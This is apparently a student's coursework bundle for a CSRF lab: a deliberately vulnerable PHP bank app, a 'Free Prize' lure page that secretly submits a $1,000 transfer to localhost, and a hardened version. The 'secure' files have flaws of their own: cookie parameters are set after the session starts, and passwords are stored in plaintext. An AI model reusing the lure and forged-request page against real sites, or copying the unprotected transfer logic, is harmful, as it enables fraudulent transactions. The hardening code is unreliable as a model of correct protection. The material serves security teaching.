================================================================================
                   EXERCISE 4.2: CSRF ATTACK - COMPLETE CODE
                   Siddesh Vilas Pawar | MSc Cyber Security
                        University of Surrey | COMM047
================================================================================

This file contains ALL code files needed for the CSRF demonstration.
Copy each section into the respective file as indicated.

DIRECTORY STRUCTURE:
csrf_demo/
├── README.md (see Exercise4_Web_Security.html)
├── vulnerable/ (6 files below)
├── attacker/ (1 file below)
└── secure/ (6 files below)

================================================================================
 VULNERABLE VERSION - Files 1-6
================================================================================

================================================================================
FILE 1: vulnerable/init_db.php
================================================================================
<?php
// Database initialization for vulnerable banking site

try {
    $db = new PDO('sqlite:bank_vulnerable.db');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    
    // Create users table with names and password for login access, then balance
    $db->exec("
        CREATE TABLE IF NOT EXISTS users (
            id INTEGER PRIMARY KEY AUTOINCREMENT,
            username TEXT UNIQUE NOT NULL,
            password TEXT NOT NULL,
            balance REAL NOT NULL DEFAULT 0
        )
    ");
    
    // Create transactions table for convo
    $db->exec("
        CREATE TABLE IF NOT EXISTS transactions (
            id INTEGER PRIMARY KEY AUTOINCREMENT,
            sender TEXT NOT NULL,
            recipient TEXT NOT NULL,
            amount REAL NOT NULL,
            timestamp DATETIME DEFAULT CURRENT_TIMESTAMP
        )
    ");
    
    // Clear existing data like users and transactions
    $db->exec("DELETE FROM users");
    $db->exec("DELETE FROM transactions");
    
    // Insert test users (plaintext passwords for demo only!)
    $users = [
        ['alice', 'alice123', 5000],
        ['bob', 'bob123', 3000],
        ['eve', 'eve123', 1000]
    ];
    
    $stmt = $db->prepare("INSERT INTO users (username, password, balance) VALUES (?, ?, ?)");
    foreach ($users as $user) {
        $stmt->execute($user);
    }
    
    echo "✓ Database initialized successfully!\n";
    echo "Test users created:\n";
    echo "  alice/alice123 - \$5,000\n";
    echo "  bob/bob123     - \$3,000\n";
    echo "  eve/eve123     - \$1,000\n";
    
} catch (PDOException $e) {
    die("✗ Database error: " . $e->getMessage());
}
?>

================================================================================
FILE 2: vulnerable/index.php
================================================================================
<?php
session_start();

if (isset($_SESSION['user'])) {
    header('Location: dashboard.php');
    exit;
}

$error = '';

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $username = $_POST['username'] ?? '';
    $password = $_POST['password'] ?? '';
    
    try {
        $db = new PDO('sqlite:bank_vulnerable.db');
        $stmt = $db->prepare("SELECT * FROM users WHERE username = ? AND password = ?");
        $stmt->execute([$username, $password]);
        $user = $stmt->fetch(PDO::FETCH_ASSOC);
        
        if ($user) {
            $_SESSION['user'] = $username;
            header('Location: dashboard.php');
            exit;
        } else {
            $error = 'Invalid credentials';
        }
    } catch (PDOException $e) {
        $error = 'Database error';
    }
}
?>
<!DOCTYPE html>
<html>
<head>
    <title>Vulnerable Bank - Login</title>
    <link rel="stylesheet" href="styles.css">
</head>
<body>
    <div class="container">
        <h1>🏦 Vulnerable Bank Login</h1>
        <div class="warning"> NO CSRF PROTECTION</div>
        
        <?php if ($error): ?>
            <div class="error"><?= htmlspecialchars($error) ?></div>
        <?php endif; ?>
        
        <form method="POST">
            <label>Username:</label>
            <input type="text" name="username" required autofocus>
            
            <label>Password:</label>
            <input type="password" name="password" required>
            
            <button type="submit">Login</button>
        </form>
        
        <p class="hint">Test users: alice/alice123, bob/bob123, eve/eve123</p>
    </div>
</body>
</html>

================================================================================
FILE 3: vulnerable/dashboard.php
================================================================================
<?php
session_start();

if (!isset($_SESSION['user'])) {
    header('Location: index.php');
    exit;
}

$username = $_SESSION['user'];

try {
    $db = new PDO('sqlite:bank_vulnerable.db');
    
    $stmt = $db->prepare("SELECT balance FROM users WHERE username = ?");
    $stmt->execute([$username]);
    $balance = $stmt->fetchColumn();
    
    $stmt = $db->prepare("
        SELECT * FROM transactions 
        WHERE sender = ? OR recipient = ? 
        ORDER BY timestamp DESC LIMIT 10
    ");
    $stmt->execute([$username, $username]);
    $transactions = $stmt->fetchAll(PDO::FETCH_ASSOC);
    
} catch (PDOException $e) {
    die('Database error');
}
?>
<!DOCTYPE html>
<html>
<head>
    <title>Dashboard - Vulnerable Bank</title>
    <link rel="stylesheet" href="styles.css">
</head>
<body>
    <div class="container">
        <h1>Welcome, <?= htmlspecialchars($username) ?></h1>
        <div class="balance">Current Balance: $<?= number_format($balance, 2) ?></div>
        
        <div class="warning"> VULNERABLE: No CSRF protection on transfer form!</div>
        
        <h2>Transfer Money</h2>
        <form method="POST" action="transfer.php">
            <label>Recipient:</label>
            <select name="recipient" required>
                <option value="">Select recipient</option>
                <?php
                $stmt = $db->prepare("SELECT username FROM users WHERE username != ?");
                $stmt->execute([$username]);
                while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) {
                    echo "<option value='{$row['username']}'>{$row['username']}</option>";
                }
                ?>
            </select>
            
            <label>Amount:</label>
            <input type="number" name="amount" min="1" step="0.01" required>
            
            <button type="submit">Transfer</button>
        </form>
        
        <h2>Recent Transactions</h2>
        <table>
            <tr><th>From</th><th>To</th><th>Amount</th><th>Time</th></tr>
            <?php foreach ($transactions as $tx): ?>
                <tr>
                    <td><?= htmlspecialchars($tx['sender']) ?></td>
                    <td><?= htmlspecialchars($tx['recipient']) ?></td>
                    <td>$<?= number_format($tx['amount'], 2) ?></td>
                    <td><?= $tx['timestamp'] ?></td>
                </tr>
            <?php endforeach; ?>
        </table>
        
        <a href="logout.php" class="logout">Logout</a>
    </div>
</body>
</html>

================================================================================
FILE 4: vulnerable/transfer.php ( VULNERABLE!)
================================================================================
<?php
session_start();

if (!isset($_SESSION['user'])) {
    die('Not logged in');
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $sender = $_SESSION['user'];
    $recipient = $_POST['recipient'] ?? '';
    $amount = floatval($_POST['amount'] ?? 0);
    
    if (empty($recipient) || $amount <= 0) {
        die('Invalid transfer parameters');
    }
    
    try {
        $db = new PDO('sqlite:bank_vulnerable.db');
        $db->beginTransaction();
        
        $stmt = $db->prepare("SELECT balance FROM users WHERE username = ?");
        $stmt->execute([$sender]);
        $sender_balance = $stmt->fetchColumn();
        
        if ($sender_balance < $amount) {
            die('Insufficient funds');
        }
        
        $stmt = $db->prepare("UPDATE users SET balance = balance - ? WHERE username = ?");
        $stmt->execute([$amount, $sender]);
        
        $stmt = $db->prepare("UPDATE users SET balance = balance + ? WHERE username = ?");
        $stmt->execute([$amount, $recipient]);
        
        $stmt = $db->prepare("
            INSERT INTO transactions (sender, recipient, amount) VALUES (?, ?, ?)
        ");
        $stmt->execute([$sender, $recipient, $amount]);
        
        $db->commit();
        
        header('Location: dashboard.php');
        exit;
        
    } catch (PDOException $e) {
        $db->rollBack();
        die('Transfer failed: ' . $e->getMessage());
    }
}
?>

================================================================================
FILE 5: vulnerable/logout.php
================================================================================
<?php
session_start();
session_destroy();
header('Location: index.php');
exit;
?>

================================================================================
FILE 6: vulnerable/styles.css
================================================================================
body { font-family: Arial, sans-serif; background: #f0f2f5; padding: 20px; }
.container { max-width: 600px; margin: 0 auto; background: white; padding: 30px; }
h1 { color: #333; text-align: center; }
.balance { background: #4CAF50; color: white; padding: 20px; text-align: center; font-size: 24px; }
.warning { background: #ff5722; color: white; padding: 15px; text-align: center; font-weight: bold; }
.success { background: #4CAF50; color: white; padding: 15px; text-align: center; font-weight: bold; }
.error { background: #f44336; color: white; padding: 10px; }
input, select { width: 100%; padding: 10px; border: 1px solid #ddd; }
button { width: 100%; padding: 12px; background: #2196F3; color: white; border: none; cursor: pointer; }
table { width: 100%; border-collapse: collapse; }

================================================================================
 ATTACKER VERSION - File 7
================================================================================

================================================================================
FILE 7: attacker/malicious.html (CSRF EXPLOIT)
================================================================================
<!DOCTYPE html>
<html>
<head>
    <title>Free Prize!</title>
    <style>
        body { font-family: Arial, sans-serif; text-align: center; padding: 50px; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); color: white; }
        .prize-box { background: white; color: #333; padding: 40px; border-radius: 20px; max-width: 600px; }
        h1 { color: #667eea; font-size: 48px; }
        p { font-size: 18px; margin: 20px 0; }
        .target-selector { background: #f5f5f5; padding: 20px; border-radius: 10px; margin: 20px 0; }
        .target-selector select { width: 100%; padding: 12px; font-size: 16px; border: 2px solid #667eea; }
        .target-vulnerable { background: #ffebee; color: #c62828; padding: 12px; }
        .target-secure { background: #e8f5e9; color: #2e7d32; padding: 12px; }
        button { background: #667eea; color: white; border: none; padding: 20px 50px; font-size: 24px; cursor: pointer; }
        .hidden { display: none; }
    </style>
</head>
<body>
    <div class="prize-box">
        <h1>Congratulations!</h1>
        <p style="font-size: 22px; font-weight: bold; color: #667eea;">
            You've Been Selected!
        </p>
        <p>
            You have won a <strong>$1,000 cash prize</strong> from our 
            exclusive promotion!
        </p>
        
        <div class="instructions">
            <strong>[For Examiner]:</strong> Select target bank below, login to that bank in another tab, then click the prize button.
        </div>
        
        <div class="target-selector">
            <label for="target-select">[Select Attack Target]</label>
            <select id="target-select" onchange="updateTarget()">
                <option value="8000">Port 8000 - Vulnerable Bank (NO CSRF Protection)</option>
                <option value="8001">Port 8001 - Secure Bank (WITH CSRF Protection)</option>
            </select>
            <div id="target-info" class="target-info target-vulnerable">
                [WARNING] Attacking VULNERABLE bank - Attack should SUCCEED
            </div>
        </div>
        
        <p>
            Click the button below to claim your reward now:
        </p>
        <button onclick="claimPrize()">Claim Your Prize!</button>
        
        <form id="csrf-attack" class="hidden" method="POST" 
              action="http://localhost:8000/transfer.php">
            <input type="hidden" name="recipient" value="eve">
            <input type="hidden" name="amount" value="1000">
        </form>
        
        <p class="disclaimer">
            *This is an educational demonstration for Exercise 4.2<br>
            <strong>Current Target:</strong> <span id="current-target">localhost:8000 (Vulnerable)</span>
        </p>
    </div>
    
    <script>
        console.log('%c[ATTACKER SITE] Cookie Analysis', 'color: red; font-size: 16px; font-weight: bold');
        console.log('Current Domain:', window.location.hostname);
        console.log('Current Port:', window.location.port);
        console.log('Cookies visible to this page:', document.cookie || '(none)');
        console.log('%cNOTE: HttpOnly cookies are NOT visible to JavaScript!', 'color: orange; font-weight: bold');
        console.log('%cBut browser WILL send them automatically with form submission!', 'color: orange; font-weight: bold');
        console.log('='.repeat(70));
        
        function updateTarget() {
            const select = document.getElementById('target-select');
            const port = select.value;
            const form = document.getElementById('csrf-attack');
            const infoDiv = document.getElementById('target-info');
            const currentTarget = document.getElementById('current-target');
            
            form.action = `http://localhost:${port}/transfer.php`;
            
            console.log(`%c[TARGET CHANGE] Port ${port}`, 'color: blue; font-weight: bold');
            console.log(`   Form will submit to: ${form.action}`);
            console.log(`   Bank type: ${port === '8000' ? 'VULNERABLE' : 'SECURE'}`);
            console.log('='.repeat(70));
            
            if (port === '8000') {
                infoDiv.className = 'target-info target-vulnerable';
                infoDiv.innerHTML = '[WARNING] Attacking VULNERABLE bank - Attack should SUCCEED';
                currentTarget.textContent = 'localhost:8000 (Vulnerable)';
            } else {
                infoDiv.className = 'target-info target-secure';
                infoDiv.innerHTML = '[PROTECTED] Attacking SECURE bank - Attack should be BLOCKED';
                currentTarget.textContent = 'localhost:8001 (Secure)';
            }
        }
        
        function claimPrize() {
            const port = document.getElementById('target-select').value;
            const bankType = port === '8000' ? 'VULNERABLE' : 'SECURE';
            
            console.log('%c[CSRF ATTACK INITIATED]', 'color: red; font-size: 18px; font-weight: bold; background: yellow');
            console.log('='.repeat(70));
            console.log('[Attack Details]');
            console.log('   Target Bank:', bankType);
            console.log('   Target URL:', `http://localhost:${port}/transfer.php`);
            console.log('   Recipient:', 'eve');
            console.log('   Amount:', '$1,000');
            console.log('='.repeat(70));
            
            console.log('[Cookies visible to attacker (JavaScript)]');
            if (document.cookie) {
                const cookies = document.cookie.split(';').map(c => c.trim());
                cookies.forEach(cookie => {
                    console.log(`   ${cookie}`);
                });
            } else {
                console.log('   (none - all cookies are HttpOnly or no cookies set)');
            }
            console.log('='.repeat(70));
            
            console.log('%c[CRITICAL] Browser\'s Automatic Behavior', 'color: orange; font-weight: bold; font-size: 14px');
            console.log('    Browser will automatically send ALL cookies for localhost:' + port);
            console.log('    This includes HttpOnly session cookies (PHPSESSID)');
            console.log('    JavaScript cannot see HttpOnly cookies, but browser sends them!');
            console.log('    This is how CSRF attacks work - cookie reuse across origins');
            console.log('='.repeat(70));
            
            console.log('%c[Submitting hidden form...]', 'color: blue; font-weight: bold');
            console.log('   Method: POST');
            console.log('   Action:', `http://localhost:${port}/transfer.php`);
            console.log('   Form data: recipient=eve, amount=1000');
            console.log('='.repeat(70));
            
            if (port === '8000') {
                console.log('%c[VULNERABLE VERSION] Expected Result:', 'color: red; font-weight: bold');
                console.log('   - No CSRF token validation');
                console.log('   - Attack will SUCCEED');
                console.log('   - Money will be transferred');
            } else {
                console.log('%c[SECURE VERSION] Expected Result:', 'color: green; font-weight: bold');
                console.log('   + CSRF token validation enabled');
                console.log('   + Attack will be BLOCKED');
                console.log('   + Transfer rejected (no valid token)');
            }
            console.log('='.repeat(70));
            
            alert(`Processing your prize...\n\nPlease wait while we verify your account.\n\n[Hidden: Attacking ${bankType} bank on port ${port}]\n\n>> CHECK BROWSER CONSOLE (F12) FOR DETAILED LOGS!`);
            
            document.getElementById('csrf-attack').submit();
        }
        
        window.addEventListener('load', function() {
            console.log('%c[SUCCESS] Attacker page loaded successfully', 'color: green; font-weight: bold');
            console.log('>> Open browser DevTools (F12) to see all cookie and attack details');
            console.log('[Instructions]');
            console.log('   1. Select target bank from dropdown');
            console.log('   2. Login to that bank in another tab');
            console.log('   3. Return here and click "Claim Your Prize"');
            console.log('   4. Watch console logs during attack');
            console.log('='.repeat(70));
        });
    </script>
</body>
</html>

================================================================================
 SECURE VERSION - Files 8-13 (WITH CSRF PROTECTION)
================================================================================

================================================================================
FILE 8: secure/init_db.php
================================================================================
<?php
// Database initialization for SECURE banking site
// (Same as vulnerable but different database name)

try {
    $db = new PDO('sqlite:bank_secure.db');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    
    $db->exec("
        CREATE TABLE IF NOT EXISTS users (
            id INTEGER PRIMARY KEY AUTOINCREMENT,
            username TEXT UNIQUE NOT NULL,
            password TEXT NOT NULL,
            balance REAL NOT NULL DEFAULT 0
        )
    ");
    
    $db->exec("
        CREATE TABLE IF NOT EXISTS transactions (
            id INTEGER PRIMARY KEY AUTOINCREMENT,
            sender TEXT NOT NULL,
            recipient TEXT NOT NULL,
            amount REAL NOT NULL,
            timestamp DATETIME DEFAULT CURRENT_TIMESTAMP
        )
    ");
    
    $db->exec("DELETE FROM users");
    $db->exec("DELETE FROM transactions");
    
    $users = [
        ['alice', 'alice123', 5000],
        ['bob', 'bob123', 3000],
        ['eve', 'eve123', 1000]
    ];
    
    $stmt = $db->prepare("INSERT INTO users (username, password, balance) VALUES (?, ?, ?)");
    foreach ($users as $user) {
        $stmt->execute($user);
    }
    
    echo "✓ Secure database initialized successfully!\n";
    echo "Test users created:\n";
    echo "  alice/alice123 - \$5,000\n";
    echo "  bob/bob123     - \$3,000\n";
    echo "  eve/eve123     - \$1,000\n";
    
} catch (PDOException $e) {
    die("✗ Database error: " . $e->getMessage());
}
?>

================================================================================
FILE 9: secure/index.php
================================================================================
<?php
session_start();

session_set_cookie_params([
    'lifetime' => 3600,
    'path' => '/',
    'domain' => 'localhost',
    'secure' => false,
    'httponly' => true,
    'samesite' => 'Lax'
]);

if (isset($_SESSION['user'])) {
    header('Location: dashboard.php');
    exit;
}

$error = '';

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $username = $_POST['username'] ?? '';
    $password = $_POST['password'] ?? '';
    
    try {
        $db = new PDO('sqlite:bank_secure.db');
        $stmt = $db->prepare("SELECT * FROM users WHERE username = ? AND password = ?");
        $stmt->execute([$username, $password]);
        $user = $stmt->fetch(PDO::FETCH_ASSOC);
        
        if ($user) {
            $_SESSION['user'] = $username;
            $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
            header('Location: dashboard.php');
            exit;
        } else {
            $error = 'Invalid credentials';
        }
    } catch (PDOException $e) {
        $error = 'Database error';
    }
}
?>
<!DOCTYPE html>
<html>
<head>
    <title>Secure Bank - Login</title>
    <link rel="stylesheet" href="styles.css">
</head>
<body>
    <div class="container">
        <h1> Secure Bank Login</h1>
        <div class="success"> CSRF PROTECTION ENABLED</div>
        
        <?php if ($error): ?>
            <div class="error"><?= htmlspecialchars($error) ?></div>
        <?php endif; ?>
        
        <form method="POST">
            <label>Username:</label>
            <input type="text" name="username" required autofocus>
            
            <label>Password:</label>
            <input type="password" name="password" required>
            
            <button type="submit">Login</button>
        </form>
        
        <p class="hint">Test users: alice/alice123, bob/bob123, eve/eve123</p>
    </div>
</body>
</html>

================================================================================
FILE 10: secure/dashboard.php
================================================================================
<?php
session_start();

if (!isset($_SESSION['user'])) {
    header('Location: index.php');
    exit;
}

if (!isset($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}

$username = $_SESSION['user'];

try {
    $db = new PDO('sqlite:bank_secure.db');
    
    $stmt = $db->prepare("SELECT balance FROM users WHERE username = ?");
    $stmt->execute([$username]);
    $balance = $stmt->fetchColumn();
    
    $stmt = $db->prepare("
        SELECT * FROM transactions 
        WHERE sender = ? OR recipient = ? 
        ORDER BY timestamp DESC LIMIT 10
    ");
    $stmt->execute([$username, $username]);
    $transactions = $stmt->fetchAll(PDO::FETCH_ASSOC);
    
} catch (PDOException $e) {
    die('Database error');
}
?>
<!DOCTYPE html>
<html>
<head>
    <title>Dashboard - Secure Bank</title>
    <link rel="stylesheet" href="styles.css">
</head>
<body>
    <div class="container">
        <h1>Welcome, <?= htmlspecialchars($username) ?></h1>
        <div class="balance">Current Balance: $<?= number_format($balance, 2) ?></div>
        
        <div class="success"> PROTECTED: CSRF tokens enabled!</div>
        
        <h2>Transfer Money</h2>
        <form method="POST" action="transfer.php">
            <input type="hidden" name="csrf_token" value="<?= $_SESSION['csrf_token'] ?>">
            
            <label>Recipient:</label>
            <select name="recipient" required>
                <option value="">Select recipient</option>
                <?php
                $stmt = $db->prepare("SELECT username FROM users WHERE username != ?");
                $stmt->execute([$username]);
                while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) {
                    echo "<option value='{$row['username']}'>{$row['username']}</option>";
                }
                ?>
            </select>
            
            <label>Amount:</label>
            <input type="number" name="amount" min="1" step="0.01" required>
            
            <button type="submit">Transfer</button>
        </form>
        
        <h2>Recent Transactions</h2>
        <table>
            <tr><th>From</th><th>To</th><th>Amount</th><th>Time</th></tr>
            <?php foreach ($transactions as $tx): ?>
                <tr>
                    <td><?= htmlspecialchars($tx['sender']) ?></td>
                    <td><?= htmlspecialchars($tx['recipient']) ?></td>
                    <td>$<?= number_format($tx['amount'], 2) ?></td>
                    <td><?= $tx['timestamp'] ?></td>
                </tr>
            <?php endforeach; ?>
        </table>
        
        <a href="logout.php" class="logout">Logout</a>
    </div>
</body>
</html>

================================================================================
FILE 11: secure/transfer.php ( PROTECTED!)
================================================================================
<?php
session_start();

if (!isset($_SESSION['user'])) {
    die('Not logged in');
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!isset($_POST['csrf_token']) || $_POST['csrf_token'] !== $_SESSION['csrf_token']) {
        die(' CSRF token validation failed! Attack blocked.');
    }
    
    $referer = $_SERVER['HTTP_REFERER'] ?? '';
    if (strpos($referer, 'http://localhost:8001') !== 0) {
        die(' Invalid referer! Request must originate from same domain.');
    }
    
    $sender = $_SESSION['user'];
    $recipient = $_POST['recipient'] ?? '';
    $amount = floatval($_POST['amount'] ?? 0);
    
    if (empty($recipient) || $amount <= 0) {
        die('Invalid transfer parameters');
    }
    
    try {
        $db = new PDO('sqlite:bank_secure.db');
        $db->beginTransaction();
        
        $stmt = $db->prepare("SELECT balance FROM users WHERE username = ?");
        $stmt->execute([$sender]);
        $sender_balance = $stmt->fetchColumn();
        
        if ($sender_balance < $amount) {
            die('Insufficient funds');
        }
        
        $stmt = $db->prepare("UPDATE users SET balance = balance - ? WHERE username = ?");
        $stmt->execute([$amount, $sender]);
        
        $stmt = $db->prepare("UPDATE users SET balance = balance + ? WHERE username = ?");
        $stmt->execute([$amount, $recipient]);
        
        $stmt = $db->prepare("INSERT INTO transactions (sender, recipient, amount) VALUES (?, ?, ?)");
        $stmt->execute([$sender, $recipient, $amount]);
        
        $db->commit();
        
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
        
        header('Location: dashboard.php');
        exit;
        
    } catch (PDOException $e) {
        $db->rollBack();
        die('Transfer failed: ' . $e->getMessage());
    }
}
?>

================================================================================
FILE 12: secure/logout.php
================================================================================
<?php
session_start();
session_destroy();
header('Location: index.php');
exit;
?>

================================================================================
FILE 13: secure/styles.css
================================================================================
body { font-family: Arial, sans-serif; background: #f0f2f5; padding: 20px; }
.container { max-width: 600px; margin: 0 auto; background: white; padding: 30px; }
h1 { color: #333; text-align: center; }
.balance { background: #4CAF50; color: white; padding: 20px; text-align: center; font-size: 24px; }
.warning { background: #ff5722; color: white; padding: 15px; text-align: center; font-weight: bold; }
.success { background: #4CAF50; color: white; padding: 15px; text-align: center; font-weight: bold; }
.error { background: #f44336; color: white; padding: 10px; }
input, select { width: 100%; padding: 10px; border: 1px solid #ddd; }
button { width: 100%; padding: 12px; background: #2196F3; color: white; border: none; cursor: pointer; }
table { width: 100%; border-collapse: collapse; }

================================================================================
 COUNTERMEASURES SUMMARY
================================================================================

IMPLEMENTED CSRF PROTECTIONS (in secure/ version):

1. Synchronizer Token Pattern (CSRF Tokens)
   - Generated on login: bin2hex(random_bytes(32))
   - Embedded in forms as hidden field
   - Validated on transfer.php submission
   - Regenerated after each use

2. SameSite Cookie Attribute
   - session_set_cookie_params(['samesite' => 'Lax'])
   - Blocks cross-site cookie transmission
   - Modern browser defense

3. Referer Header Validation
   - Checks HTTP_REFERER header
   - Ensures request originates from same domain
   - Fallback defense (can be stripped by proxies)

4. HttpOnly Cookie Flag
   - Prevents JavaScript access to session cookie
   - Mitigates XSS-based session theft

5. Token Regeneration
   - New token generated after each transfer
   - Prevents token reuse attacks

================================================================================
 END OF CODE
================================================================================

References:
- PHP CSRF Tutorial: https://www.phptutorial.net/php-tutorial/php-csrf/
- OWASP CSRF Prevention: https://owasp.org/www-community/attacks/csrf
- RFC 6265bis (SameSite): https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis
